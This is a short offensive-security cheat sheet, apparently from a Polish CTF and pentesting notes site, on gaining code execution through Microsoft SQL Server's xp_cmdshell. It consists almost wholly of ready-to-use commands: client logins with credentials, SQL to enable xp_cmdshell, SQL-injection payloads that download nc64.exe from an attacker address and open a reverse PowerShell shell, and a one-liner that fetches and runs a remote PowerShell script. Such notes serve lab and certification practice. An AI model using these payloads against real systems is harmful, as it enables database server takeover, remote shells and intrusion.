>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Initial Access / MSSQL xp_cmdshell RCE

MSSQL xp_cmdshell RCE

Initial Access SQL Injection linux

Connect

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
impacket-mssqlclient -db volume -windows-auth disco/""::""@10.11.1.13
mssqlclient.py RALPH/sa:poiuytrewq@10.11.1.43

Enable xp_cmdshell

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';

Drop and execute a binary via SQLi

'; exec master..xp_cmdshell 'powershell -command Invoke-WebRequest -Uri http://192.168.45.210/nc64.exe -Outfile C:\\temp\\nc64.exe'--
'; exec master..xp_cmdshell 'c:\\temp\\nc64.exe 192.168.45.210 4444 -e powershell'--

Quick get-shell pattern (interactive client)

enable_xp_cmdshell
xp_cmdshell powershell iex (iwr -usebasicparsing http://192.168.119.156/rev2.ps1)